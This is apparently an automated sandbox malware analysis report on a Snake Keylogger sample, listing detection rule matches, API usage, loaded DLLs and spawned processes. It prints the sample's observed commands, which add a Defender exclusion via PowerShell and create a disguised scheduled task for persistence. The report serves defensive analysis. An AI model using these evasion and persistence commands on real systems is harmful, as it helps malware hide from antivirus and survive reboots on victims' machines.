Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 3140, EUR.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: lkuPOyvaWlIu.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs	Security API names: _0020.SetAccessControl
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs	Security API names: _0020.AddAccessRule
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, onTDHLANSwQB4GuLwN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs	Security API names: _0020.SetAccessControl
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs	Security API names: _0020.AddAccessRule
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, onTDHLANSwQB4GuLwN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs	Security API names: _0020.SetAccessControl
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs	Security API names: _0020.AddAccessRule
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, onTDHLANSwQB4GuLwN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 3140, EUR.exe, 00000000.00000002.1725784467.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OobeEnableRtpAndSigUpdates;.VBP

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/15@4/4

Source: C:\Users\user\Desktop\3140, EUR.exe

File created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_03
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03

Source: C:\Users\user\Desktop\3140, EUR.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE737.tmp

Jump to behavior

Source: 3140, EUR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 3140, EUR.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\3140, EUR.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3140, EUR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 3140, EUR.exe	ReversingLabs: Detection: 47%
Source: 3140, EUR.exe	Virustotal: Detection: 43%

Source: C:\Users\user\Desktop\3140, EUR.exe

File read: C:\Users\user\Desktop\3140, EUR.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"

Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: schannel.dll	Jump to behavior
